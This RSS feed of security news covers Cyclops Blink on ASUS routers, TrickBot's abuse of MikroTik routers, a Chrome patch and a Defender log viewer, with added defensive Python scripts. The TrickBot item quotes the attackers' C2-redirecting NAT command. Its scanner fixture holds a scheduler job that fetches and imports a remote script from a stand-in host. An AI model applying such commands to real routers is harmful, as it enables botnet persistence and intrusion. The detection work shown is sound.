<?xml version="1.0"?>
<rss version="2.0"><channel><title><![CDATA[News: Security & Privacy News]]></title><link>https://nsaneforums.com/news/security-privacy-news/page/133/?d=2</link><description><![CDATA[News: Security & Privacy News]]></description><language>en</language><item><title>ASUS warns of Cyclops Blink malware attacks targeting routers</title><link>https://nsaneforums.com/news/security-privacy-news/asus-warns-of-cyclops-blink-malware-attacks-targeting-routers-r4799/</link><description><![CDATA[<p>
	Multiple ASUS router models are vulnerable to the Russia-linked Cyclops Blink malware threat, causing the vendor to publish an advisory with mitigations for the security risk.
</p>

<p>
	 
</p>

<p>
	Cyclops Blink is a malware <a href="https://www.bleepingcomputer.com/news/security/us-uk-link-new-cyclops-blink-malware-to-russian-state-hackers/" target="_blank" rel="external nofollow">linked to the Russian-backed Sandworm</a> hacking group that has historically targeted WatchGuard Firebox and other SOHO network devices.
</p>

<p>
	 
</p>

<p>
	The role of Cyclops Blink is to establish persistence for threat actors on the device, allowing them a point of remote access to compromised networks.
</p>

<p>
	 
</p>

<p>
	Because Cyclops Blink is modular, it can be easily updated to target new devices, constantly refreshing its scope and tapping into new pools of exploitable hardware.
</p>

<h2>
	Cyclops Blink now targets ASUS routers
</h2>

<p>
	In a coordinated disclosure, Trend Micro warned that the malware features <a href="https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html" rel="external nofollow" target="_blank">a specialized module</a> that targets several ASUS routers, allowing the malware to read the flash memory to gather information about critical files, executables, data, and libraries.
</p>

<p>
	 
</p>

<p>
	The malware then receives a command to nest in the flash memory and establish permanent persistence, as this storage space doesn't get wiped even by factory resets.
</p>

<p>
	 
</p>

<p>
	For more details on the ASUS module of Cyclops Blink, <a href="https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html" rel="external nofollow" target="_blank">Trend Micro</a> has published a technical writeup today explaining how it works.
</p>

<p>
	 
</p>

<p>
	<img alt="asus_write.jpg" class="ipsImage" data-ratio="75.10" height="540" width="688" src="https://www.bleepstatic.com/images/news/u/1220909/Code%20and%20Details/asus_write.jpg">
</p>

<div>
	<figure>
		<figcaption>
			Module's code for writing to flash memory (Trend Micro)
		</figcaption>
	</figure>
</div>

<p>
	At this point, the spread of Cyclops Blink appears indiscriminate and widespread, so owners of the affected models should apply the mitigations regardless of whether they consider themselves a likely target.
</p>

<p>
	 
</p>

<p>
	As the malware is tied to the elite Sandworm hacking group (also tracked as Voodoo Bear, BlackEnergy, and TeleBots), we will likely see the threat actors targeting other router manufacturers in the future.
</p>

<p>
	 
</p>

<p>
	Sandworm has been linked to other well-known cyberattacks, including the BlackEnergy malware behind the Ukrainian blackouts of 2015 and 2016 [<a href="https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html" rel="external nofollow" target="_blank">1</a>, <a href="https://ics.sans.org/blog/2016/01/09/confirmation-of-a-coordinated-attack-on-the-ukrainian-power-grid?utm_source=hs_email&amp;utm_medium=email&amp;utm_content=25135530&amp;_hsenc=p2ANqtz-87XLhYBXFcESdxOIJIB8DSoYBZ5sPrfHQv9xNUp11BwFsfcUBouRDj-R7y6YcJY2BsrUeKvRVbwO4lPcVAPgHLmDrj7w&amp;_hsmi=25135530" rel="external nofollow" target="_blank">2</a>, <a href="https://www.sentinelone.com/blog/sentinelone-discovers-a-new-delivery-tactic-for-blackenergy-3/" rel="external nofollow" target="_blank">3</a>] and the <a href="https://www.bleepingcomputer.com/news/security/security-firms-find-thin-lines-connecting-notpetya-to-ukraine-power-grid-attacks/" target="_blank" rel="external nofollow">NotPetya ransomware</a>, which caused billions of dollars in damage to companies worldwide starting in June 2017.
</p>

<h2>
	Vulnerable ASUS devices
</h2>

<p>
	In an <a href="http://www.asus.com/content/ASUS-Product-Security-Advisory/" rel="external nofollow" target="_blank">advisory released today</a>, ASUS warns that the following router models and firmware versions are vulnerable to Cyclops Blink attacks:
</p>

<p>
	 
</p>

<ul>
	<li>
		GT-AC5300 firmware under 3.0.0.4.386.xxxx
	</li>
	<li>
		GT-AC2900 firmware under 3.0.0.4.386.xxxx
	</li>
	<li>
		RT-AC5300 firmware under 3.0.0.4.386.xxxx
	</li>
	<li>
		RT-AC88U firmware under 3.0.0.4.386.xxxx
	</li>
	<li>
		RT-AC3100 firmware under 3.0.0.4.386.xxxx
	</li>
	<li>
		RT-AC86U firmware under 3.0.0.4.386.xxxx
	</li>
	<li>
		RT-AC68U, AC68R, AC68W, AC68P firmware under 3.0.0.4.386.xxxx
	</li>
	<li>
		RT-AC66U_B1 firmware under 3.0.0.4.386.xxxx
	</li>
	<li>
		RT-AC3200 firmware under 3.0.0.4.386.xxxx
	</li>
	<li>
		RT-AC2900 firmware under 3.0.0.4.386.xxxx
	</li>
	<li>
		RT-AC1900P firmware under 3.0.0.4.386.xxxx
	</li>
	<li>
		RT-AC87U (EOL)
	</li>
	<li>
		RT-AC66U (EOL)
	</li>
	<li>
		RT-AC56U (EOL)
	</li>
</ul>
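<p>
	To show how the list above is used in practice, here is an added example (not ASUS's or Trend Micro's code): a small Python script that triages a router inventory against the advisory. The model set and the 3.0.0.4.386 threshold come from the list; the firmware-string separators it accepts and the sample fleet are assumptions, and the fleet rows are constructed.
</p>

```python
"""Triage an inventory of ASUS routers against the Cyclops Blink advisory list.

Added example for this article; it is not ASUS's or Trend Micro's tooling.
The inventory rows in the demo are constructed, not a real fleet."""
import re

# The advisory says firmware "under 3.0.0.4.386.xxxx" is affected; "xxxx" is a
# build-number placeholder, so the comparison is made on the 3.0.0.4.386 prefix.
AFFECTED_BELOW = (3, 0, 0, 4, 386)

# Models the advisory lists with a firmware threshold. "AC68R" etc. in the
# article are ASUS's shorthand for RT-AC68R and so on.
ADVISORY_MODELS = {
    "GT-AC5300", "GT-AC2900", "RT-AC5300", "RT-AC88U", "RT-AC3100", "RT-AC86U",
    "RT-AC68U", "RT-AC68R", "RT-AC68W", "RT-AC68P", "RT-AC66U_B1", "RT-AC3200",
    "RT-AC2900", "RT-AC1900P",
}
# End-of-life models: no fix will ship; ASUS says to replace them.
EOL_MODELS = {"RT-AC87U", "RT-AC66U", "RT-AC56U"}


def parse_version(text):
    """Turn an ASUS firmware string into a tuple of ints for numeric comparison.

    Strings like '3.0.0.4.384_81351' and '3.0.0.4.386.45898' are both accepted
    (the separator handling is an assumption). Comparing the raw strings would
    be wrong: '3.0.0.4.9' sorts after '3.0.0.4.386' as text.
    """
    parts = re.split(r"[._-]", text.strip())
    nums = [int(p) for p in parts if p.isdigit()]
    if len(nums) < 5:
        raise ValueError(f"unrecognised ASUS firmware version: {text!r}")
    return tuple(nums)


def normalise_model(model):
    """'AC68R' -> 'RT-AC68R'; already-qualified names pass through unchanged."""
    model = model.strip().upper()
    return model if "-" in model else "RT-" + model


def classify(model, firmware):
    """Return one of: 'eol-replace', 'affected', 'at-threshold', 'not-listed'."""
    model = normalise_model(model)
    if model in EOL_MODELS:
        return "eol-replace"
    if model not in ADVISORY_MODELS:
        return "not-listed"
    if parse_version(firmware)[:5] < AFFECTED_BELOW:
        return "affected"
    # At or above 3.0.0.4.386: outside the advisory's "under" range. The article
    # notes that no Cyclops Blink-specific firmware exists yet, so the listed
    # mitigations (reset, update, new password, remote management off) still apply.
    return "at-threshold"


def triage(inventory):
    """inventory: iterable of (hostname, model, firmware) tuples.
    Returns {hostname: classification} so a fleet can be sorted by urgency."""
    return {host: classify(model, fw) for host, model, fw in inventory}


if __name__ == "__main__":
    # Constructed sample fleet, not real devices.
    FLEET = [
        ("branch-a", "RT-AC68U", "3.0.0.4.384_81351"),
        ("branch-b", "AC68R", "3.0.0.4.386.45898"),
        ("branch-c", "RT-AC66U", "3.0.0.4.380_7743"),
        ("lab", "RT-AX88U", "3.0.0.4.386.46061"),
    ]
    for host, verdict in sorted(triage(FLEET).items(), key=lambda kv: kv[1]):
        print(f"{host:10} {verdict}")
```

<p>
	The comparison is done on integer tuples rather than on the raw strings; comparing firmware strings as text would rank 3.0.0.4.9 above 3.0.0.4.386 and silently mark a vulnerable device as safe.
</p>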

<p>
	 
</p>

<p>
	At this time, ASUS has not released new firmware updates to protect against Cyclops Blink but has published the following mitigations for securing devices:
</p>

<p>
	 
</p>

<ul>
	<li>
		Reset the device to factory default: Log into the web GUI, go to Administration → Restore/Save/Upload Setting, click "Initialize all the setting and clear all the data log," and then click the Restore button.
	</li>
	<li>
		Update to the latest available firmware.
	</li>
	<li>
		Ensure the default admin password has been changed to a more secure one.
	</li>
	<li>
		Disable Remote Management (disabled by default, can only be enabled via Advanced Settings).
	</li>
</ul>

<p>
	 
</p>

<p>
	If you are using any of the three models designated as EOL (end of life), note that these are no longer supported and thus won't receive a firmware security update. In this case, ASUS recommends replacing the device with a new one.
</p>

<p>
	 
</p>

<p>
	If you own WatchGuard network devices and are looking for that advisory instead, you can find the vendor's threat mitigation advice <a href="https://www.watchguard.com/wgrd-news/blog/important-detection-and-remediation-actions-cyclops-blink-state-sponsored-botnet" rel="external nofollow" target="_blank">on this webpage</a>.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/asus-warns-of-cyclops-blink-malware-attacks-targeting-routers/" rel="external nofollow">ASUS warns of Cyclops Blink malware attacks targeting routers</a>
</p>
]]></description><guid isPermaLink="false">4799</guid><pubDate>Thu, 17 Mar 2022 20:15:22 +0000</pubDate></item><item><title>Microsoft creates tool to scan MikroTik routers for TrickBot infections</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-creates-tool-to-scan-mikrotik-routers-for-trickbot-infections-r4798/</link><description><![CDATA[<p>
	Microsoft released a scanner that detects MikroTik routers hacked by the TrickBot gang to act as proxies for command and control servers.
</p>

<p>
	 
</p>

<p>
	TrickBot is a malware botnet distributed via phishing emails or dropped by other malware that has already infected a device. Once executed, TrickBot will connect to a remote command and control server to receive commands and download further payloads to run on the infected machine.
</p>

<p>
	 
</p>

<p>
	For years, TrickBot has used IoT devices, such as routers, to <a href="https://www.bleepingcomputer.com/news/security/emotet-uses-compromised-devices-as-proxy-command-servers/" target="_blank" rel="external nofollow">act as a proxy</a> between an infected device and command and control servers (C2). These proxies are used to prevent researchers and law enforcement from finding and disrupting their command and control infrastructure.
</p>

<p>
	 
</p>

<p>
	In a new report by Microsoft, researchers explain how the TrickBot gang targeted vulnerable MikroTik routers using various methods to incorporate them as proxies for C2 communications.
</p>

<h2>
	Routing malicious traffic
</h2>

<p>
	The TrickBot operators used several methods to break into MikroTik routers, first trying default credentials and then brute-forcing the password.
</p>

<p>
	 
</p>

<p>
	If these initial methods did not provide access to the router, the threat actors would attempt to exploit <a href="https://nvd.nist.gov/vuln/detail/cve-2018-14847" rel="external nofollow" target="_blank">CVE-2018-14847</a>, a critical directory traversal vulnerability in the WinBox interface that allows unauthenticated, remote attackers to read arbitrary files. Using this vulnerability, the threat actors would steal the 'user.dat' file, which contains the user credentials for the router.
</p>

<p>
	 
</p>

<p>
	Once they gained access to the device, the threat actors used built-in '/ip', '/system', or '/tool' commands to create a network address translation (NAT) rule that rerouted traffic sent to port 449 on the router to port 80 on a remote command and control server.
</p>

<p>
	 
</p>

<pre>/ip firewall nat add chain=dstnat proto=tcp dst-port=449 to-port=80 action=dst-nat to-addresses=[infected device] dst-address=[real C2 address]</pre>

<p>
	With this NAT rule in place, infected machines talk to the router rather than to the C2 server directly, so the real C2 address stays hidden from analysts while communication continues to flow.
</p>

<p>
	 
</p>

<p>
	<img alt="diagram(6).jpg" class="ipsImage" data-ratio="64.89" height="462" width="712" src="https://www.bleepstatic.com/images/news/u/1220909/Diagrams/diagram(6).jpg">
</p>

<div>
	<figure>
		<figcaption>
			TrickBot using MikroTik routers in C2 traffic (Microsoft)
		</figcaption>
	</figure>
</div>

<p>
	As Microsoft underlines, the actors appear to have in-depth knowledge of RouterOS, the Linux-based operating system on MikroTik devices, issuing RouterOS-specific commands over SSH that would make no sense on other devices.
</p>

<h2>
	The MikroTik problem
</h2>

<p>
	An <a href="https://www.bleepingcomputer.com/news/security/hundreds-of-thousands-of-mikrotik-devices-still-vulnerable-to-botnets/" target="_blank" rel="external nofollow">Eclypsium report</a> highlighted last December that hundreds of thousands of MikroTik routers are still vulnerable to malware botnets, several years after the vendor cautioned about the existence of critical flaws.
</p>

<p>
	 
</p>

<p>
	Because these devices feature unusually powerful hardware, they are seen as high-value targets by malicious actors, especially those interested in resource-intensive operations such as <a href="https://www.bleepingcomputer.com/news/security/new-m-ris-botnet-breaks-ddos-record-with-218-million-rps-attack/" target="_blank" rel="external nofollow">DDoS attacks</a>.
</p>

<p>
	 
</p>

<p>
	Although security updates have been available for years, many devices remain unpatched and can be recruited into botnets through unauthenticated remote access and code execution flaws.
</p>

<p>
	 
</p>

<p>
	The owners of MikroTik devices have been repeatedly urged to upgrade to RouterOS versions newer than 6.45.6 and avoid exposing the WinBox protocol.
</p>

<p>
	 
</p>

<p>
	"This analysis highlights the importance of keeping IoT devices secure in today’s ever evolving threat environment," Microsoft <a href="http://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/" rel="external nofollow" target="_blank">warns in their report</a>.
</p>

<p>
	 
</p>

<p>
	Microsoft has now released a forensics tool named '<a href="http://github.com/microsoft/routeros-scanner" rel="external nofollow" target="_blank">routeros-scanner</a>' that network admins can use to scan MikroTik devices for signs that they were compromised by TrickBot.
</p>

<p>
	 
</p>

<p>
	This script will scan MikroTik devices for the following information:
</p>

<p>
	 
</p>

<ul dir="auto">
	<li>
		Get the version of the device and map it to CVEs
	</li>
	<li>
		Check for scheduled tasks
	</li>
	<li>
		Look for traffic redirection rules
	</li>
	<li>
		Look for DNS cache poisoning
	</li>
	<li>
		Look for default ports change
	</li>
	<li>
		Look for non-default users
	</li>
	<li>
		Look for suspicious files
	</li>
	<li>
		Look for proxy, socks, and FW rules
	</li>
</ul>

<p>
	Additionally, <a href="https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/" rel="external nofollow" target="_blank">Microsoft recommends</a> performing the following steps on MikroTik devices to secure them further:
</p>

<p>
	 
</p>

<ul>
	<li>
		Change the default password to a strong one
	</li>
	<li>
		Block port 8291 from external access
	</li>
	<li>
		Change SSH port to something other than the default (22)
	</li>
	<li>
		Make sure routers are up to date with the latest firmware and patches
	</li>
	<li>
		Use a secure virtual private network (VPN) service for remote access and restrict remote access to the router
	</li>
</ul>
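<p>
	The NAT rule shown earlier and several of the scanner's checks (redirection rules, scheduled tasks, exposed management services) can be reproduced offline against a saved <code>/export</code> from the router. The following Python script is an added example for this article, not Microsoft's routeros-scanner: the export excerpt is constructed, 203.0.113.0/24 is a documentation range standing in for a C2 address, and the 192.168.88.0/24 "inside" network is an assumption about the operator's LAN.
</p>

```python
"""Scan a RouterOS configuration export for the TrickBot redirection pattern
described above and for the exposure Microsoft's hardening list targets.

Added example for this article; it is not Microsoft's routeros-scanner and the
export text below is constructed, not a real capture. 203.0.113.0/24 is the
TEST-NET-3 documentation range standing in for an attacker's C2 address."""
import ipaddress
import shlex

# Networks the operator considers "inside". Assumption for the example: a
# dst-nat rule that forwards inbound traffic anywhere else is suspicious.
LAN_NETWORKS = [ipaddress.ip_network("192.168.88.0/24")]

# The RouterOS CLI accepts unambiguous abbreviations, so the same rule can be
# written "proto=tcp to-port=80" (as in Microsoft's command above) or
# "protocol=tcp to-ports=80" (as /export prints it). Normalise both forms.
ALIASES = {"proto": "protocol", "to-port": "to-ports"}

SAMPLE_EXPORT = """\
# mar/17/2022 10:00:00 by RouterOS 6.45.9
/ip firewall nat
add action=dst-nat chain=dstnat dst-port=449 protocol=tcp \\
    to-addresses=203.0.113.10 to-ports=80
add action=masquerade chain=srcnat out-interface=ether1
add action=dst-nat chain=dstnat comment="reverse proxy" dst-port=443 \\
    protocol=tcp to-addresses=192.168.88.10 to-ports=443
/ip service
set ssh port=22
set winbox port=8291
set www address=192.168.88.0/24 port=80
/system scheduler
add interval=10m name=upd on-event="/tool fetch url=http://203.0.113.10/u.rsc;/import u.rsc"
"""


def parse_export(text):
    """Yield (menu, verb, item, params) for every add/set line of an export.

    Tracks the current menu (e.g. "/ip firewall nat"), joins lines that
    /export wrapped with a trailing backslash, lets shlex handle quoted
    values, and applies ALIASES to parameter names. 'item' is the bare word
    in lines such as 'set ssh port=22'.
    """
    menu, pending = None, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):
            pending += line[:-1] + " "
            continue
        line, pending = pending + line, ""
        if line.startswith("/"):
            menu = line
            continue
        tokens = shlex.split(line)
        verb, item, params = tokens[0], None, {}
        for tok in tokens[1:]:
            if "=" in tok:
                key, value = tok.split("=", 1)
                params[ALIASES.get(key, key)] = value
            else:
                item = tok
        yield menu, verb, item, params


def inside_lan(address):
    """True only for a literal IP inside LAN_NETWORKS; hostnames are not
    provably internal, so they count as outside."""
    try:
        ip = ipaddress.ip_address(address)
    except ValueError:
        return False
    return any(ip in net for net in LAN_NETWORKS)


def scan(export_text):
    """Return a list of human-readable findings; an empty list means nothing flagged."""
    findings = []
    for menu, verb, item, p in parse_export(export_text):
        if menu == "/ip firewall nat" and p.get("action") == "dst-nat":
            target = p.get("to-addresses", "")
            if not inside_lan(target):
                findings.append(
                    f"nat: dst-nat {p.get('protocol')}/{p.get('dst-port')} -> "
                    f"{target}:{p.get('to-ports')} forwards inbound traffic outside "
                    "the LAN (TrickBot C2-proxy pattern)")
        elif menu == "/ip service" and item in ("ssh", "winbox", "www", "telnet", "api", "ftp"):
            if "address" not in p:
                findings.append(f"service: {item} reachable from any source (no address= restriction)")
            # /export omits defaults, so a missing port means the default 22.
            if item == "ssh" and p.get("port", "22") == "22":
                findings.append("service: ssh on default port 22")
        elif menu == "/system scheduler" and "fetch" in p.get("on-event", ""):
            findings.append(f"scheduler: job {p.get('name')!r} pulls remote content: {p['on-event']}")
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EXPORT):
        print(finding)
```

<p>
	Against the constructed export the script flags the port 449 → 80 redirection to the outside host, the unrestricted SSH and WinBox services, SSH on its default port, and a scheduler job that fetches remote content; the dst-nat rule pointing at an internal reverse proxy is left alone. The parser deliberately accepts both the abbreviated parameter names Microsoft printed and the long forms <code>/export</code> emits, since a rule typed one way is stored and exported the other.
</p>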

<h2>
	TrickBot still alive?
</h2>

<p>
	In February 2022, the <a href="https://www.bleepingcomputer.com/news/security/trickbot-malware-operation-shuts-down-devs-move-to-stealthier-malware/" target="_blank" rel="external nofollow">TrickBot operation was shut down</a>, and its developers are now <a href="https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/" target="_blank" rel="external nofollow">working with the Conti ransomware gang</a> on stealthier malware, such as the <a href="https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/" target="_blank" rel="external nofollow">BazarBackdoor</a> and <a href="https://www.bleepingcomputer.com/news/security/lazarus-hackers-use-trickbot-to-infect-high-end-victims/" target="_blank" rel="external nofollow">Anchor</a> families.
</p>

<p>
	 
</p>

<p>
	As <a href="https://www.bleepingcomputer.com/news/security/trickbot-malware-under-siege-from-all-sides-and-its-working/" target="_blank" rel="external nofollow">TrickBot has been disrupted</a> in the past and later launched again, we may see threat actors reviving the operation in the future. Therefore, it is essential to make sure devices are properly secured so they cannot be abused in later campaigns or by other malware groups.
</p>

<p>
	 
</p>

<p>
	In the meantime, if you are using a MikroTik device, you are advised to run Microsoft's scanner: the shutdown does not undo the malicious configuration already written to compromised routers, and those NAT rules could be put back to use in the future.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/microsoft-creates-tool-to-scan-mikrotik-routers-for-trickbot-infections/" rel="external nofollow">Microsoft creates tool to scan MikroTik routers for TrickBot infections</a>
</p>
]]></description><guid isPermaLink="false">4798</guid><pubDate>Thu, 17 Mar 2022 20:12:57 +0000</pubDate></item><item><title>Google Patches Critical Vulnerability With Chrome 99 Update</title><link>https://nsaneforums.com/news/security-privacy-news/google-patches-critical-vulnerability-with-chrome-99-update-r4780/</link><description><![CDATA[<p>
	A Chrome 99 update released by Google on Tuesday patches a critical vulnerability discovered by one of the company’s own researchers.
</p>

<p>
	 
</p>

<p>
	The critical flaw, tracked as CVE-2022-0971, has been described as a use-after-free issue affecting the Blink Layout component. Sergei Glazunov of Google Project Zero has been credited for reporting the flaw.
</p>

<p>
	 
</p>

<p>
	Google doesn’t often assign a “critical severity” rating to Chrome vulnerabilities. In fact, over the past year, only four other Chrome updates fixed a critical issue. Two of the four critical vulnerabilities were discovered by Glazunov, who has also identified a high-severity bug that was patched this week.
</p>

<p>
	 
</p>

<p>
	The latest Chrome update includes 11 security fixes, eight of them rated “high severity.” Flaws in this class typically enable remote code execution or a sandbox escape, and most of this batch are use-after-free bugs.
</p>

<p>
	 
</p>

<p>
	Google has paid out nearly $40,000 to the external researchers who reported the vulnerabilities patched with this Chrome update, but some rewards have yet to be determined.
</p>

<p>
	 
</p>

<p>
	The internet giant said recently that it paid out nearly $9 million in bug bounties last year, including roughly $3.1 million for Chrome vulnerabilities.
</p>

<p>
	 
</p>

<p>
	There has been a surge in Chrome vulnerabilities exploited in the wild, with 14 zero-days exploited in 2021, far more than any other popular web browser.
</p>

<p>
	 
</p>

<p>
	Google last week attempted to explain this trend, naming several factors that have apparently contributed.
</p>

<p>
	 
</p>

<p>
	The list includes more transparency regarding active exploitation, increased complexity of the browser, the need to chain multiple flaws for a useful exploit, and attackers increasingly targeting the browser itself following the death of Flash, their former favorite target.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.securityweek.com/google-patches-critical-vulnerability-chrome-99-update" rel="external nofollow">source</a>
</p>

<p>
	 
</p>

<p>
	 
</p>
]]></description><guid isPermaLink="false">4780</guid><pubDate>Thu, 17 Mar 2022 03:30:49 +0000</pubDate></item><item><title>Display all threats that Windows Defender detected with WinDefLogView</title><link>https://nsaneforums.com/news/security-privacy-news/display-all-threats-that-windows-defender-detected-with-windeflogview-r4768/</link><description><![CDATA[<p>
	WinDefLogView is a new portable application by <a data-wpel-link="internal" href="https://www.ghacks.net/2017/05/22/nirsoft-net-review-tech-sites-we-love/" rel="external nofollow">Nirsoft</a>. The program displays information about recent threats that the default Windows security solution detected.
</p>

<p>
	 
</p>

<p>
	<img alt="windows-defender-log-view.webp" class="ipsImage" data-ratio="75.10" height="313" width="720" src="https://www.ghacks.net/wp-content/uploads/2022/03/windows-defender-log-view.webp">
</p>

<p>
	 
</p>


<p>
	While it is possible to check detected threats elsewhere, doing so requires quite a few clicks in the Windows Security app. The way results are displayed is also not ideal for getting a quick overview of recent threats.
</p>

<p>
	 
</p>

<p>
	WinDefLogView is a typical Nirsoft application. It is small in size and portable. Just download the archive from the Nirsoft website, extract it on the system, and run the executable file to launch the app. The program reads Defender logs from Windows 10 and 11 only, but it can itself run on older versions of Windows, e.g., Windows 7, when pointed at a remote system running Windows 10 or 11.
</p>

<p>
	 
</p>

<p>
	The interface displays all detected threats in a table. Each line lists the filename, detection name, threat name, severity, category, action, origin, process name and more. A click on a column header sorts the listing accordingly, e.g., by date or severity.
</p>

<p>
	 
</p>

<p>
	The shortcut Ctrl-F or the selection of Edit &gt; Find displays a search box that filters the list by the text you enter; this is useful if lots of threats are displayed. The selection of File &gt; Choose data source enables you to retrieve the data from remote computer systems or external folders.
</p>

<p>
	 
</p>

<p>
	The right-click menu displays several options. The most interesting opens the threat URL on Microsoft's website, which offers additional information on the detected threat.
</p>

<p>
	 
</p>

<p>
	WinDefLogView is a threat viewer, which means that it does not offer any options to react to the threats it displays. Some or all lines can be exported to the local system in several formats, including CSV, JSON and XML. Items can also be copied directly using CTRL-C. The copied items can then be pasted into spreadsheet applications such as Excel.
</p>

<p>
	 
</p>

<p>
	Description on Nirsoft's website:
</p>

<p>
	 
	</p><p style="margin-left: 40px;">
		WinDefLogView is a tool for Windows 10 and Windows 11 that reads the event log of Windows Defender (Microsoft-Windows-Windows Defender/Operational) and displays a log of threats detected by Windows Defender on your system. For every log line, the following information is displayed: Filename, Detect Time, Threat Name, Severity, Category, Detection User, Action, Origin, and more...
	</p>


<p>
	 
</p>

<p>
	You can view the detected threats log on your local computer, on remote computers on your network, and on an external disk plugged into your computer.
</p>
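<p>
	The tool's core job, reading the Microsoft-Windows-Windows Defender/Operational log and flattening each detection into a table row, can be reproduced offline from an export of that log. The Python script below is an added example for this article, not Nirsoft's code. On a Windows host the XML comes from <code>wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:xml</code>, which emits bare Event elements with no root; the three events embedded here are constructed to match that shape, the threat names and paths are placeholders, and the EventData field names are those Defender uses for events 1116 (detection) and 1117 (action taken), which is an assumption you should check against your own export.
</p>

```python
"""Build a WinDefLogView-style threat table from exported Windows Defender
operational events, pairing each detection (event 1116) with the action
Defender later logged for it (event 1117) via the shared Detection ID.

Added example for this article; it is not Nirsoft's code. The events below
are constructed in the shape emitted by:
    wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:xml
Threat names and paths are placeholders; the EventData field names are the
ones Defender uses for 1116/1117 (assumption)."""
import csv
import io
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
DETECT_FIELDS = ["Threat Name", "Severity Name", "Category Name", "Path",
                 "Detection User", "Process Name", "Origin Name", "FWLink"]

SAMPLE_EVENTS = r"""
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Windows Defender"/><EventID>1116</EventID>
    <TimeCreated SystemTime="2022-03-16T09:12:03.511Z"/><Computer>WS01</Computer></System>
  <EventData>
    <Data Name="Detection ID">{11111111-2222-3333-4444-555555555555}</Data>
    <Data Name="Threat Name">Trojan:Win32/Sample.A!ml</Data>
    <Data Name="Severity Name">Severe</Data>
    <Data Name="Category Name">Trojan</Data>
    <Data Name="FWLink">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:Win32/Sample.A!ml</Data>
    <Data Name="Process Name">C:\Windows\explorer.exe</Data>
    <Data Name="Detection User">WS01\alice</Data>
    <Data Name="Path">file:_C:\Users\alice\Downloads\invoice.exe</Data>
    <Data Name="Origin Name">Internet</Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Windows Defender"/><EventID>1117</EventID>
    <TimeCreated SystemTime="2022-03-16T09:12:05.002Z"/><Computer>WS01</Computer></System>
  <EventData>
    <Data Name="Detection ID">{11111111-2222-3333-4444-555555555555}</Data>
    <Data Name="Threat Name">Trojan:Win32/Sample.A!ml</Data>
    <Data Name="Action Name">Quarantine</Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Windows Defender"/><EventID>1116</EventID>
    <TimeCreated SystemTime="2022-03-16T10:40:19.000Z"/><Computer>WS01</Computer></System>
  <EventData>
    <Data Name="Detection ID">{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}</Data>
    <Data Name="Threat Name">PUA:Win32/Sample.B</Data>
    <Data Name="Severity Name">Low</Data>
    <Data Name="Category Name">Potentially Unwanted Software</Data>
    <Data Name="Path">file:_C:\Tools\bundle.exe</Data>
    <Data Name="Detection User">NT AUTHORITY\SYSTEM</Data>
    <Data Name="Origin Name">Local machine</Data>
  </EventData>
</Event>
"""


def parse_events(xml_text):
    """Yield (event_id, time_created, computer, {data name: value}) per <Event>.
    wevtutil output has no single root element, so wrap it before parsing."""
    root = ET.fromstring("<Events>" + xml_text + "</Events>")
    for ev in root.findall("e:Event", NS):
        system = ev.find("e:System", NS)
        event_id = int(system.findtext("e:EventID", namespaces=NS))
        when = system.find("e:TimeCreated", NS).get("SystemTime")
        computer = system.findtext("e:Computer", namespaces=NS)
        data = {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)}
        yield event_id, when, computer, data


def threat_table(xml_text):
    """One row per Detection ID: detection details from 1116, outcome from 1117.
    A detection with no matching 1117 is kept and marked, not dropped; that gap
    (Defender saw something but never reported acting on it) is worth noticing."""
    rows = {}
    for event_id, when, computer, data in parse_events(xml_text):
        row = rows.setdefault(data.get("Detection ID"), {
            "Computer": computer, "Detect Time": when, "Action Name": "(no action logged)"})
        if event_id == 1116:
            row["Detect Time"] = when
            row.update({f: data.get(f, "") for f in DETECT_FIELDS})
        elif event_id == 1117:
            row["Action Name"] = data.get("Action Name", "")
    return list(rows.values())


def to_csv(rows):
    """Flatten the rows to CSV text, mirroring the tool's export option."""
    columns = ["Computer", "Detect Time", *DETECT_FIELDS, "Action Name"]
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=columns, extrasaction="ignore")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    print(to_csv(threat_table(SAMPLE_EVENTS)))
```

<p>
	Joining on Detection ID is the step a plain event-log view does not do for you: the first sample detection resolves to "Quarantine" while the second has no 1117 event at all and is reported as such. The FWLink field is the per-threat Microsoft URL the tool opens from its right-click menu.
</p>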

<p>
	 
</p>

<p>
	<strong>Closing Words</strong>
</p>

<p>
	 
</p>

<p>
	WinDefLogView is a useful application, as it provides a quick view of all detected Windows Defender threats. While it does not support threat actions, it may point users in the right direction immediately without having to use the cumbersome Windows Security application.
</p>

<p>
	 
</p>

<p>
	Now You: do you use Windows Defender?
</p>

<p>
	 
</p>


<p>
	 
</p>

<p>
